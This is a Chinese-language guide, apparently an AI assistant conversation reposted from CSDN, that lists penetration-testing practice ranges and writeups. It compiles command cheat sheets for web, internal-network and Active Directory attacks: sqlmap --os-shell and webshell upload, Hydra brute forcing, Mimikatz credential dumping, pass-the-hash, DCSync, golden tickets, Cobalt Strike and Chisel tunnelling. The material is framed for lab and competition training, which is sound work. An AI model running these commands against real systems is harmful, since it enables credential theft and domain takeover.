下面按类型帮你梳理主流渗透靶场的入口/下载地址,以及配套 WP(writeup)文章的获取途径。
🌐 在线靶场平台(打开即用)
- DVWA(Damn Vulnerable Web Application):经典入门靶场,SQLi/XSS/文件上传/命令注入等十几种漏洞,Low→Medium→High→Impossible 四级难度可调。官网 dvwa.co.uk,也可用 Docker 一行拉起:
docker run -d -p 80:80 vulnerables/web-dvwa - PortSwigger Web Security Academy(Burp Suite 官方靶场):覆盖 HTTP 走私、污染、SQLi、XSS、XXE、SSRF 等全部 Web 漏洞类型,每个漏洞配讲解 + 交互式实验环境,免费。入口:portswigger.net/web-security/all-labs
- WebGoat:OWASP 官方出品,Java 版,每种漏洞带教学文档,比 DVWA 更系统。官网 owasp.org/www-project-webgoat
- bWAPP:100 多种漏洞,覆盖几乎全部 OWASP Top 10,适合刷完 DVWA 后进阶。官网 itsecgames.com
- Pikachu:国内作者开发,中文界面,集成 SQLi、XSS、CSRF、SSRF、文件包含/上传等,对新手极友好。GitHub 搜
pikachu可取源码 - SQLi-Labs / XSS-Labs / Upload-Labs:三个专项靶场,分别 75 关 SQL 注入、20 余关 XSS、20 关文件上传绕过,GitHub 搜项目名即可下载源码
- Hack The Box(HTB):全球最火的在线渗透平台,Web/逆向/密码学/取证,每周更新靶机,积分排名在外企认可度高。入口 hackthebox.com
- TryHackMe:比 HTB 更友好,有结构化学习路径和引导式 walkthrough,含 Windows/Linux 靶场,浏览器内置攻击机。入口 tryhackme.com
- Root Me:法国老牌免费平台,400+ CTF 风格挑战,涵盖密码学、Web、脚本、网络、编程。入口 root-me.org
- OverTheWire(Wargames):命令行闯关式学习,经典 Bandit/Narnia 系列,全部免费。入口 overthewire.org/wargames
- OffSec Proving Grounds(PG 靶场):OSCP/OSEP 认证官方练习场,认可度极高。入口 offsec.com
- 国内在线靶场:BUUCTF(buuoj.cn,历年 CTF 真题量最大)、XCTF 攻防世界(adworld.xctf.org.cn)、CTFHub(ctfhub.com,按技能树组织)、墨者学院(mozhe.cn/bug)、封神台(hack.zkaq.cn)、春秋云镜(yunjing.ichunqiu.com)、好靶场(loveli.com.cn,500+ 原创靶机)
💾 可下载靶机镜像(本地搭建)
- VulnHub:社区贡献的靶机镜像宝库,.ova/.vmdk 格式,导入 VMware/VirtualBox 即可,含 Kioptrix 系列、DC 系列、HackTheBox 退役机器等。入口 vulnhub.com
- Vulhub:基于 Docker + Docker-Compose 的漏洞环境集合,预置大量 Nday 场景,一键启动,适合漏洞复现和 POC 验证。官网 vulhub.org
- Vulfocus:白帽汇推出的漏洞集成平台,Docker 镜像一键启动、自动更新 Flag、支持计分考核。入口 vulfocus.cn
- 红日靶场(VulnStack):模拟真实企业内网,涵盖域控、黄金票据、横向移动,目前共 7 套,网上 WP 齐全。入口 vulnstack.qiyuanxuetang.net/vuln
- HackMyVM:类似 VulnHub 的国际平台,提供虚拟机镜像,含域环境和少量 Windows 靶机。官网 hackmyvm.eu
- Metasploitable 2/3:Rapid7 官方靶机,漏洞密集,专为 Metasploit 框架练习设计
- CyberStrikeLab:域渗透 + 内网渗透综合场景,从 3 台到 7-8 台多层网络横向移动,部分涉及免杀。入口 cyberstrikelab.com
- GOAD(Game of Active Directory):专注 AD 攻击技术的开源靶场,Vagrant + Ansible 自动化部署
- VulnTarget:开源综合实战靶场,社区维护,支持提交设计
📝 WP / 通关教程文章汇总
- DVWA 全关卡通关 + 源码审计:博客园「H轨迹H」的 DVWA 合集,覆盖暴力破解、命令注入、文件包含、文件上传、弱会话、不安全验证码、重定向、JS 攻击、CSP 绕过、未授权绕过、XSS 全部关卡的 Low→Impossible 全级别通关与代码审计,见 cnblogs.com/GuijiH6
- DVWA SQL 注入实操笔记:FreeBuf 上的 DVWA SQLi Low/Medium/High 全级别手工注入通关,附 Payload 和原理拆解,见 freebuf.com/news/489636.html
- VulnHub 靶机 WP:CSDN 博主「judy2580」的 DC-1、DC-2 完整渗透测试笔记,从信息收集到提权全流程记录,见 blog.csdn.net/zd8206
- CyberStrikeLab 域渗透 WP:「【域渗透】CyberStrikelab 靶场 lab1-lab11,3w 字超详细」,是目前该靶场最完整的中文通关文档
- HackMyVM Windows 域渗透 WP:「全网首发!HMV 全套 13 台 Windows 域渗透教程,3w 字超详细」,覆盖域控与横向移动
- HTB 靶机 WP:如「HTB-Chemistry 靶机渗透教程」,HTB 官方论坛(forum.hackthebox.com)的「Writeups」板块也有大量社区 WP
- CTF 解题思路合集:CSDN「50 个 CTF 实战解题核心思路」,覆盖 Web/逆向/PWN/密码学/隐写高频套路,见 blog.csdn.net/m0_56146626/article/details/159169341
- 综合汇总帖:知乎「全网最全渗透测试靶场推荐【2026最新靶场推荐】」和 CSDN「2026网络安全实战靶场平台汇总:20个练手平台」,两篇都附带了各靶场的配套文章链接,适合作为索引收藏
💡 建议路线:DVWA → bWAPP/Pikachu → 专项靶场(SQLi-Labs、Upload-Labs)→ VulnHub/HTB 综合靶机 → 红日靶场/VulnStack 内网渗透。刷的时候建议边打边记 Payload、漏洞原理和修复方案,配合 nmap、sqlmap、hydra、Burp Suite 使用。
wp
下面把之前提到的 WP 文章逐条整理出来,能确认到的都附上了链接或明确来源;个别 WP 标题只出现在汇总帖里,但没有检索到独立可访问的原文链接,我会标注出来。
DVWA 全模块通关 + 源码审计
- 来源:博客园「H轨迹H」
- 内容:覆盖 DVWA 的 Brute Force、Command Injection、File Inclusion、File Upload、Weak Session IDs、Insecure CAPTCHA、Open HTTP Redirect、JavaScript Attacks、CSP Bypass、Authorisation Bypass、XSS 等模块,基本是 Low / Medium / High / Impossible 全级别通关 + 源码审计。
- 访问方式:在博客园搜索
H轨迹H DVWA,或进入该作者博客园主页后按“DVWA靶场”系列文章浏览。 - 说明:检索到的原文是各模块独立文章,未找到该系列“总目录页”的精确链接,所以不单独给一个固定 URL。
DVWA SQL 注入全级别通关
- 标题:DVWA SQL 注入全级别通关笔记(Low / Medium / High / Impossible)
- 来源:CSDN
- 链接:https://blog.csdn.net/news/489636.html
- 内容:Low / Medium / High / Impossible 四个级别的显注、盲注、sqlmap 用法、POST 注入绕过、Session 机制与代码审计。
- 说明:之前提到的 FreeBuf 链接未检索到对应原文,CSDN 这篇内容更完整,建议以这篇为准。
DVWA SQL Injection 通关教程
- 标题:DVWA靶场通关——SQL Injection篇
- 来源:博客园 ljbguanli
- 访问方式:博客园搜索
ljbguanli DVWA SQL Injection - 内容:Low 级别 Union 注入、字段数判断、回显点确认、爆库爆表爆字段;Medium 级别 POST 型注入。
DVWA 保姆级通关教程
- 标题:dvwa靶场通关教程(保姆及教学,一看就会)
- 来源:CSDN
- 访问方式:CSDN 搜索
dvwa靶场通关教程 保姆 - 内容:覆盖暴力破解、命令注入、CSRF、文件包含、文件上传、不安全验证码、SQL 注入、盲注、弱会话、DOM/反射/存储型 XSS、CSP Bypass、JS 攻击等。
VulnHub DC-1 / DC-2 通关笔记
- 作者:judy2580
- 来源:CSDN
- 访问方式:CSDN 搜索
judy2580 DC-1和judy2580 DC-2 - 内容:DC-1 涉及 Drupal 站点、历史漏洞利用、配置文件读取、数据库凭证获取、提权;DC-2 涉及 WordPress、SSH 弱口令、rbash 绕过、sudo 提权。
- 补充:VulnHub DC-1 还有博客园「娜娜米」的通关文章,可搜索
VulnHub DC-1靶机通关 娜娜米。
CyberStrikeLab Lab1 及系列 WP
- 博客园版:Cyberstrikelab Lab1,作者「巡璃27」,包含 nmap、fscan、域用户密码、NTLM 哈希、MS17-010、端口转发等过程。
- CSDN 版:CyberStrikeLab-Lab1,涉及 EyouCMS 前台 GetShell、RCE 上线、内网扫描、域控发现、永恒之蓝等。
- 访问方式:分别搜索
Cyberstrikelab Lab1 巡璃27 博客园、CyberStrikeLab Lab1 CSDN。 - 说明:之前提到的“lab1-lab11 3w 字超详细 WP”确实存在于 2026 年的靶场汇总推荐中,但未检索到该长文的独立可访问链接,建议在知乎或公众号搜索
CyberStrikelab lab1-lab11 3w字继续定位。
HackMyVM 相关 WP
- HMV DC04:CSDN 文章《【hackmyvm】DC04靶机wp》,涉及 NTLM 中毒、SMB 探测、RPC 用户信息、压缩包破解、黄金票据、PTT 等。
- HMV always:博客园《hackmyvm靶机 always复现》,涉及 FTP、RDP、Apache、CVE-2017-0213 提权。
- 访问方式:分别搜索
hackmyvm DC04 wp CSDN、hackmyvm靶机 always复现 博客园。 - 说明:之前提到的“HMV 全套 13 台 Windows 域渗透教程,3w 字超详细”在 2026 年靶场推荐文章中出现过,但未检索到该合集的独立原文链接。
HTB Chemistry 靶机 WP
- CSDN 版:HTB:Chemistry[WriteUP],涉及 nmap、5000 端口、CIF 文件上传、CVE-2024-23346、database.db、sqlite3 查询等。
- 博客园版:Hack The Box-Chemistry靶机渗透,作者「H轨迹H」,涉及 CVE-2024-23346 RCE、SSH 登录、CVE-2024-23334 aiohttp 路径遍历、root flag。
- 访问方式:搜索
HTB Chemistry WriteUP CSDN或H轨迹H HTB Chemistry。
CTF 50 个实战解题思路
- 标题:CTF选手必藏的50个实战解题思路!一篇够用!
- 来源:CSDN
- 访问方式:CSDN 搜索
CTF选手必藏的50个实战解题思路 - 内容:Web 安全 15 个思路、逆向与 PWN 12 个技巧、密码学与隐写 13 个思路、MISC 与编程 10 个方法。
- 说明:之前给出的带
159169341的文章 ID 未检索到对应原文,建议按标题搜索,避免点错链接。
2026 靶场汇总类文章
- 知乎版:拒绝信息差,全网最全渗透测试靶场推荐【2026最新版】,作者/账号“泷羽Sec”。
- 公众号版:同名文章,内容与知乎版基本一致。
- CSDN 版:2026网络安全实战靶场平台汇总:20个练手平台,收藏这一篇就够了!
- 访问方式:知乎 / 微信 / CSDN 分别搜索上述标题即可。
使用建议
刷 WP 时建议按这个顺序看:先看靶场官方文档或 README,再自己打一遍,最后对照 WP 补盲区。尤其打 VulnHub、HTB、红日靶场、CyberStrikeLab 这类综合靶机时,WP 只适合复盘,不要直接照抄命令。
常用工具使用方法
结合你之前刷靶场的场景,把 nmap、sqlmap、Burp Suite、Hydra 的常用命令和实战技巧整理成一套可直接套用的速查表。
nmap:信息收集与端口/服务识别
常用扫描:
# 基础主机发现
nmap -sn 192.168.1.0/24
# 常用端口快速扫描
nmap -F 192.168.1.100
# 全端口 TCP 扫描
nmap -p- 192.168.1.100
# SYN 半开放扫描
nmap -sS -p 1-65535 192.168.1.100
# 服务版本探测
nmap -sV -p 80,443,22,3306 192.168.1.100
# 操作系统识别
nmap -O --osscan-guess 192.168.1.100
# 综合探测
nmap -A -p- 192.168.1.100
# UDP 扫描
nmap -sU -p 53,69,161,500 192.168.1.100
# 输出结果
nmap -sV -oN result.txt -oX result.xml 192.168.1.100
NSE 脚本实战:
# 漏洞检测
nmap --script vuln 192.168.1.100
# Web 目录枚举
nmap --script http-enum -p 80,443 target.com
# 心脏出血检测
nmap --script ssl-heartbleed -p 443 target.com
# 永恒之蓝检测
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.0/24
# SQL 注入初筛
nmap --script http-sql-injection -p 80 target.com
# 子域名爆破
nmap --script dns-brute target.com
实战技巧:
- 内网先
-sn探活,再对存活主机做-sV -A。 - 打 HTB/VulnHub 时,先
-p-扫全端口,避免漏掉非标准端口服务。 - 内网横向时,
smb-vuln-ms17-010很常用。 - 需要隐蔽时可用
--scan-delay、--max-rate、-f分片、-D诱饵。
sqlmap:SQL 注入检测与数据提取
基础检测:
# GET 注入检测
sqlmap -u "http://target/?id=1" --batch
# POST 注入检测
sqlmap -u "http://target/login" \
--data "username=admin&password=123" --batch
# 从 Burp 请求文件检测
sqlmap -r request.txt --batch
# Cookie 注入
sqlmap -u "http://target/?id=1" \
--cookie "uid=123" --batch
数据枚举:
# 枚举数据库
sqlmap -u "URL" --batch --dbs
# 枚举表
sqlmap -u "URL" --batch -D security --tables
# 枚举字段
sqlmap -u "URL" --batch -D security -T users --columns
# 导出字段
sqlmap -u "URL" --batch \
-D security -T users -C username,password --dump
进阶利用:
# 指定注入技术
sqlmap -u "URL" --technique=BEUST --batch
# 提高检测深度
sqlmap -u "URL" --level=3 --risk=2 --batch
# 获取系统 Shell
sqlmap -u "URL" --os-shell
# 读取文件
sqlmap -u "URL" --file-read "/etc/passwd"
# 上传文件
sqlmap -u "URL" \
--file-write shell.php --file-dest "/var/www/html/shell.php"
# WAF 绕过
sqlmap -u "URL" \
--tamper=space2comment,between,randomcase --batch
实战技巧:
- 靶场里先手动判断注入类型,再用 sqlmap 验证。
- 有 WAF 时先
--identify-waf,再配合--tamper。 --level越高测试越全面,但请求量也会明显增加。--os-shell属于高风险操作,只在授权靶场里练习。
Burp Suite:抓包、重放与 Web 漏洞验证
推荐工作流:
浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证
常用操作:
- Proxy:监听
127.0.0.1:8080,浏览器配置代理并安装 Burp CA 证书。 - Target / Scope:把靶场域名加入 Scope,减少无关流量。
- Repeater:手工改包验证 SQLi、XSS、SSRF、越权、接口逻辑漏洞。
- Intruder:做密码爆破、参数 fuzz、验证码/Token 绕过测试。
- Decoder:做 Base64、URL、Hex 等编码解码。
- Collaborator:验证盲注、SSRF、外带数据类漏洞。
Intruder 爆破登录示例:
- 在 Proxy 拦截登录请求。
- 右键 Send to Intruder。
- 在 Positions 里清除默认标记,只标记密码字段。
- 在 Payloads 加载字典,如
rockyou.txt或自定义字典。 - 攻击类型选 Sniper 或 Pitchfork,观察响应长度、状态码差异。
实战技巧:
- 浏览器优先用 Firefox,配合 FoxyProxy 管理代理。
- HTTPS 抓包必须安装 Burp CA 证书。
- 验证漏洞时,先在 Repeater 重放确认,再用 Intruder 批量测试。
- 复杂接口可配合 Macros 处理 CSRF Token。
Hydra:服务弱口令爆破
SSH 爆破:
hydra -L users.txt -P pass.txt -t 6 -vV ssh://192.168.1.100
FTP 爆破:
hydra -l admin -P pass.txt -t 6 -vV ftp://192.168.1.100
HTTP POST 表单爆破:
hydra -l admin -P pass.txt -t 6 -vV \
192.168.1.100 http-post-form \
"/login.php:username=^USER^&password=^PASS^:Login Failed"
RDP 爆破:
hydra -L users.txt -P pass.txt -t 2 -vV rdp://192.168.1.100
MySQL 爆破:
hydra -l root -P pass.txt -t 6 -vV mysql://192.168.1.100
实战技巧:
- 字典质量比线程数更重要,优先用针对性字典。
- 线程数不要太高,SSH/RDP 这类服务建议
-t 2到-t 6。 - 有验证码、登录锁定、WAF 时,Hydra 效果会明显下降。
- 找到结果后加
-f或-F及时停止。 - 爆破结果可用
-o result.txt保存。
靶场实战推荐组合
| 靶场场景 | 推荐工具组合 | 练习重点 |
|---|---|---|
| DVWA / Pikachu | Burp + sqlmap + Hydra | Web 漏洞、注入、爆破 |
| SQLi-Labs | sqlmap + Burp Repeater | 注入类型判断与利用 |
| Upload-Labs | Burp + 文件上传绕过 | 后缀、MIME、截断、解析 |
| VulnHub / HTB | nmap + Burp + sqlmap + Hydra | 信息收集到漏洞利用全流程 |
| 红日靶场 / VulnStack | nmap + Hydra + 域渗透工具 | 内网探测、弱口令、横向移动 |
所有命令只建议在本地靶场、授权环境或比赛环境中练习。打靶时可以先用 nmap 找入口,再用 Burp 分析 Web 逻辑,遇到注入上 sqlmap,遇到登录口再考虑 Hydra,这样链路会更清晰。
内网渗透/域渗透的常用工具链
结合你平时练 Kali 内网渗透、会话管理和工具部署的场景,下面这套可以当作内网/域渗透工具链速查表。全部命令只建议在本地靶场、授权环境或比赛环境里练习。
实战链路
内网入口 → 信息收集 → 凭据获取 → 横向移动 → 域路径分析 → 代理穿透 → 拿下域控
1. Mimikatz:凭据抓取与传递
基础提权与凭据抓取:
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
哈希传递:
sekurlsa::pth /user:admin /domain:domain.local /ntlm:NTLM_HASH
票据操作:
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi
DCSync 获取域哈希:
lsadump::dcsync /domain:domain.local /user:Administrator
黄金票据:
kerberos::golden /user:Administrator /domain:domain.local /sid:SID /krbtgt:KRBTGT_HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi
实战技巧:
- 打靶机时先确认是否拿到管理员权限,否则 Mimikatz 很多功能会失败。
- 抓取凭据后优先看 NTLM Hash、明文密码、Kerberos 票据三类。
- 生产环境里 Mimikatz 极易触发告警,靶场练习时也要养成“先复现、再分析日志”的习惯。
2. Cobalt Strike:会话管理与内网穿透
启动 Team Server:
./teamserver 攻击机IP 密码
客户端连接后常用操作:
# 调整心跳
sleep 5
# 开启 SOCKS 代理
socks 1080
# 反向端口转发
rportfwd 8080 内网IP 80
# 查看会话
beacon list
# 执行系统命令
shell whoami
shell ipconfig /all
shell net user /domain
横向移动:
# PsExec
psexec \\目标IP -u 用户名 -p 密码
# WMI 横向
wmi 目标IP getsystem
# 计划任务
schtasks /create /s 目标IP /tn 任务名 /tr "payload" /sc once /st 时间
实战技巧:
- CS 很适合练“多会话管理”,比如从入口机跳到内网多台主机。
- HTTP/HTTPS Beacon 适合常规环境,DNS Beacon 适合只放行 DNS 的靶场。
- 代理打通后,本地工具可通过
socks 1080访问内网服务。
3. BloodHound:域关系可视化
数据收集:
SharpHound.exe -c All
SharpHound.exe -c All --Loop
Python 收集器:
python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All
分析流程:
- 把 SharpHound 生成的 zip 导入 BloodHound。
- 运行 Shortest Paths to Domain Admins。
- 查找 DCSync 权限、GenericAll、本地管理员路径。
- 标记已控主机,重新计算攻击路径。
实战技巧:
- BloodHound 不直接执行攻击,它帮你画“从当前用户到域管”的最短路径。
- 打域靶场时,先跑一次 SharpHound,能大幅减少盲目枚举。
4. Impacket:远程执行与 Kerberos 攻击
远程执行:
python3 psexec.py domain/user:pass@目标IP
python3 wmiexec.py domain/user:pass@目标IP
python3 smbexec.py domain/user:pass@目标IP
python3 dcomexec.py domain/user:pass@目标IP
python3 atexec.py domain/user:pass@目标IP "whoami"
哈希传递:
python3 psexec.py -hashes :NTLM_HASH domain/user@目标IP
python3 wmiexec.py -hashes :NTLM_HASH domain/user@目标IP
凭据与 Kerberos:
python3 secretsdump.py domain/user:pass@DC_IP
python3 GetUserSPNs.py domain/user:pass -request
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat
python3 ntlmrelayx.py -t smb://目标IP
实战技巧:
wmiexec隐蔽性较好,不依赖创建服务。psexec通用性强,但痕迹相对明显。GetUserSPNs.py常用于 Kerberoasting 场景。secretsdump.py适合在拿到域管凭据后导出域内哈希。
5. 辅助横向工具
CrackMapExec 批量验证:
crackmapexec smb 192.168.1.0/24 -u administrator -H NTLM_HASH
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
Evil-WinRM 远程 PowerShell:
evil-winrm -i 目标IP -u administrator -p 密码
evil-winrm -i 目标IP -u administrator -H NTLM_HASH
RDP 横向:
xfreerdp /v:目标IP /u:administrator /p:密码
内网代理:
proxychains nmap -sT -Pn 192.168.2.10
proxychains curl http://内网IP
打靶场推荐顺序
- VulnHub / HTB 单靶机:练 nmap → 提权 → Mimikatz。
- 红日靶场 / VulnStack:练域信息收集、横向移动、CS 会话管理。
- CyberStrikeLab / GOAD:练 BloodHound、Kerberoasting、DCSync、黄金票据。
- 复盘阶段:把每一步命令、凭据、路径整理成自己的工具链笔记。
从入口机到域控的完整打靶流程模板
下面这套模板按“西湖论剑线下城市网络战”风格设计:入口机 → 内网探测 → 横向移动 → 域控 → 代理穿透 → 关键资产。团队赛里可以一人负责 Web 入口,一人负责内网探测,一人负责域渗透,一人负责代理/Flag 提交。
阶段 0:赛前准备
# 攻击机基础配置
ip a
route -n
cat /etc/resolv.conf
systemctl status network-manager
# 常用字典与工具检查
ls /usr/share/wordlists/rockyou.txt
which nmap sqlmap hydra crackmapexec evil-winrm proxychains
建议赛前把 nmap、sqlmap、Burp、Hydra、CrackMapExec、Impacket、proxychains、Chisel 全部确认可用。
阶段 1:入口机突破
# 端口与服务探测
nmap -sV -sC -p- 入口机IP
nmap -A -p 80,443,8080,8443 入口机IP
# Web 目录枚举
dirsearch -u http://入口机IP -e php,asp,html
ffuf -u http://入口机IP/FUZZ -w /usr/share/wordlists/dirb/common.txt
# 常见入口点
# - Web 后台弱口令
# - 文件上传 / 命令执行
# - SQL 注入
# - Redis / Tomcat / Jenkins 未授权
# - 旧 CMS 历史漏洞
拿到 Shell 后先做本地信息收集:
whoami
hostname
ip a
netstat -antp
cat /etc/passwd
find / -perm -4000 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
阶段 2:内网探测
# 本机网络
ip a
route -n
cat /etc/resolv.conf
# 存活主机探测
nmap -sn 192.168.2.0/24
fping -ag 192.168.2.0/24
# 端口批量探测
nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/24
# 域信息
net user /domain
nltest /dclist:domain.local
nslookup domain.local
Windows 靶机可用:
systeminfo
whoami /all
net user
net group "Domain Admins" /domain
net view /domain
阶段 3:凭据获取
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
# Impacket 远程导出
python3 secretsdump.py domain/user:pass@DC_IP
# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -request
# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat
拿到哈希或密码后,优先整理成表格:用户名、明文密码、NTLM Hash、所在主机。
阶段 4:横向移动
# PsExec
python3 psexec.py domain/admin:pass@目标IP
# WMIExec
python3 wmiexec.py domain/admin:pass@目标IP
# SMBExec
python3 smbexec.py domain/admin:pass@目标IP
# WinRM
evil-winrm -i 目标IP -u admin -p pass
evil-winrm -i 目标IP -u admin -H NTLM_HASH
# CrackMapExec 批量验证
crackmapexec smb 192.168.2.0/24 -u admin -p pass
crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH
阶段 5:域控突破
# BloodHound 收集
SharpHound.exe -c All
python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All
# DCSync
python3 secretsdump.py domain/admin@DC_IP
mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt
# 黄金票据
kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi
拿下域控后,优先检查:域管账号、GPO、共享、计划任务、其他主机本地管理员。
阶段 6:代理与穿透
# CS 开启 SOCKS
socks 1080
# Chisel 反向代理
# 攻击机
chisel server -p 9999 --reverse
# 靶机
chisel client 攻击机IP:9999 R:1080:socks
# proxychains 使用
proxychains nmap -sT -Pn 10.10.10.10
proxychains evil-winrm -i 10.10.10.10 -u admin -p pass
阶段 7:Flag 与复盘
常见 Flag 位置:
/root/flag.txt
C:\Users\Administrator\Desktop\flag.txt
C:\flag.txt
/var/www/html/flag
数据库某张表
DNS TXT 记录
HTTP 响应头
复盘时建议记录:
- 入口点是什么。
- 拿到了哪些凭据。
- 横向路径:入口机 → 哪台主机 → 域控。
- 用了哪些工具。
- 哪些步骤卡住、为什么卡住。
- 如果重打一遍,哪里可以更快。
团队分工建议
| 角色 | 任务 | 常用工具 |
|---|---|---|
| Web 手 | 找入口、打 Web 漏洞 | Burp、sqlmap、dirsearch |
| 内网手 | 探测、凭据、横向 | nmap、CrackMapExec、Mimikatz |
| 域渗透手 | 域信息、票据、DCSync | BloodHound、Impacket、Evil-WinRM |
| 代理/提交手 | 隧道、Flag 提交、记录 | proxychains、Chisel、笔记表 |
这套模板适合赛前反复演练:先用红日靶场/VulnStack 跑通一遍,再把每一步命令固化成团队自己的速查表。
完整的渗透测试工具链速查手册
按 Web 渗透→内网渗透→域渗透的结构排好
下面这份已经按 Web 渗透 → 内网渗透 → 域渗透 的顺序整理好了,可以直接复制到 Obsidian、Notion、Typora 或打印成纸质速查表。全部命令只用于本地靶场、授权环境和比赛练习。
渗透测试工具链速查手册
一、Web 渗透
1. 信息收集
# 主机发现
nmap -sn 192.168.1.0/24
# 端口与服务探测
nmap -sV -sC -p- 目标IP
nmap -A -p 80,443,8080,8443 目标IP
# Web 目录枚举
dirsearch -u http://目标IP -e php,asp,html
ffuf -u http://目标IP/FUZZ -w /usr/share/wordlists/dirb/common.txt
# 子域名探测
nmap --script dns-brute 目标域名
2. 常见入口点
- Web 后台弱口令
- 文件上传 / 命令执行
- SQL 注入
- Redis、Tomcat、Jenkins 未授权
- 旧 CMS 历史漏洞
- SSRF、XXE、反序列化
3. SQL 注入
# GET 注入
sqlmap -u "http://target/?id=1" --batch
# POST 注入
sqlmap -u "http://target/login" \
--data "username=admin&password=123" --batch
# 从 Burp 请求文件检测
sqlmap -r request.txt --batch
# 枚举数据库
sqlmap -u "URL" --batch --dbs
# 枚举表
sqlmap -u "URL" --batch -D security --tables
# 枚举字段
sqlmap -u "URL" --batch -D security -T users --columns
# 导出字段
sqlmap -u "URL" --batch \
-D security -T users -C username,password --dump
# WAF 绕过
sqlmap -u "URL" \
--tamper=space2comment,between,randomcase --batch
4. 爆破与弱口令
# SSH 爆破
hydra -L users.txt -P pass.txt -t 6 -vV ssh://目标IP
# FTP 爆破
hydra -l admin -P pass.txt -t 6 -vV ftp://目标IP
# HTTP POST 表单爆破
hydra -l admin -P pass.txt -t 6 -vV \
目标IP http-post-form \
"/login.php:username=^USER^&password=^PASS^:Login Failed"
# RDP 爆破
hydra -L users.txt -P pass.txt -t 2 -vV rdp://目标IP
5. Burp Suite 常用流程
浏览器/FoxyProxy → Burp Proxy → Repeater → Intruder → 漏洞验证
- Proxy:抓包、改包。
- Repeater:验证 SQLi、XSS、越权、逻辑漏洞。
- Intruder:密码爆破、参数 fuzz。
- Decoder:编码解码。
- Collaborator:盲注、SSRF、外带数据验证。
6. 拿到 Web Shell 后
whoami
hostname
ip a
netstat -antp
cat /etc/passwd
find / -perm -4000 2>/dev/null
cat /var/www/html/config.php 2>/dev/null
二、内网渗透
1. 本机信息收集
# Linux
ip a
route -n
cat /etc/resolv.conf
cat /etc/passwd
netstat -antp
find / -perm -4000 2>/dev/null
# Windows
systeminfo
whoami /all
ipconfig /all
net user
net localgroup administrators
2. 内网存活探测
nmap -sn 192.168.2.0/24
fping -ag 192.168.2.0/24
nmap -sT -Pn -p 22,80,445,3389,135,139,8080 192.168.2.0/24
3. 服务探测
# SMB
nmap --script smb-vuln-ms17-010 -p 445 目标网段
# HTTP
nmap --script http-enum -p 80,443,8080 目标IP
# 数据库
nmap -sV -p 3306,1433,5432,6379 目标IP
4. 凭据抓取
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
5. 横向移动
# PsExec
python3 psexec.py domain/user:pass@目标IP
python3 psexec.py -hashes :NTLM_HASH domain/user@目标IP
# WMIExec
python3 wmiexec.py domain/user:pass@目标IP
# SMBExec
python3 smbexec.py domain/user:pass@目标IP
# WinRM
evil-winrm -i 目标IP -u admin -p pass
evil-winrm -i 目标IP -u admin -H NTLM_HASH
# CrackMapExec 批量验证
crackmapexec smb 192.168.2.0/24 -u admin -p pass
crackmapexec smb 192.168.2.0/24 -u admin -H NTLM_HASH
6. 代理穿透
# Cobalt Strike
socks 1080
# Chisel 反向代理
# 攻击机
chisel server -p 9999 --reverse
# 靶机
chisel client 攻击机IP:9999 R:1080:socks
# proxychains 使用
proxychains nmap -sT -Pn 10.10.10.10
proxychains evil-winrm -i 10.10.10.10 -u admin -p pass
三、域渗透
1. 域信息收集
# Windows 本机
net user /domain
net group "Domain Admins" /domain
nltest /dclist:domain.local
nslookup domain.local
# Impacket
python3 secretsdump.py domain/user:pass@DC_IP
2. BloodHound 分析
SharpHound.exe -c All
SharpHound.exe -c All --Loop
python3 bloodhound.py -u user -p pass -d domain.local -ns DNS_IP --zip -c All
分析重点:
- Shortest Paths to Domain Admins
- DCSync 权限
- GenericAll
- 本地管理员路径
- 已控主机重新计算路径
3. Kerberos 攻击
# Kerberoasting
python3 GetUserSPNs.py domain/user:pass -request
# AS-REP Roasting
python3 GetNPUsers.py domain/ -usersfile users.txt -format hashcat
# 票据传递
kerberos::ptt ticket.kirbi
4. DCSync 与黄金票据
# DCSync
python3 secretsdump.py domain/admin@DC_IP
mimikatz lsadump::dcsync /domain:domain.local /user:krbtgt
# 黄金票据
kerberos::golden /user:admin /domain:domain.local /sid:SID /krbtgt:HASH /ticket:golden.kirbi
kerberos::ptt golden.kirbi
5. 域控后检查
- 域管账号列表
- GPO 策略
- 域共享
- 计划任务
- 其他主机本地管理员
- DNS、ADCS、Exchange 等关键资产
四、团队赛分工模板
| 角色 | 任务 | 常用工具 |
|---|---|---|
| Web 手 | 找入口、打 Web 漏洞 | Burp、sqlmap、dirsearch、ffuf |
| 内网手 | 探测、凭据、横向 | nmap、CrackMapExec、Mimikatz |
| 域渗透手 | 域信息、票据、DCSync | BloodHound、Impacket、Evil-WinRM |
| 代理/提交手 | 隧道、Flag 提交、记录 | proxychains、Chisel、笔记表 |
五、赛前检查清单
- nmap、sqlmap、Burp、Hydra 可用
- CrackMapExec、Impacket、Evil-WinRM 可用
- Mimikatz、SharpHound、BloodHound 可用
- proxychains、Chisel 可用
- 字典:
rockyou.txt、常见弱口令字典 - 攻击机网络、DNS、代理配置正常
- 团队分工明确,Flag 提交流程明确
六、赛后复盘模板
- 入口点是什么?
- 拿到了哪些凭据?
- 横向路径:入口机 → 哪台主机 → 域控?
- 用了哪些工具?
- 哪些步骤卡住?原因是什么?
- 如果重打一遍,哪里可以更快?
- 哪些命令可以固化为团队速查表?
转载自 CSDN-专业IT技术社区
原文链接:https://blog.csdn.net/2503_91800161/article/details/167039489




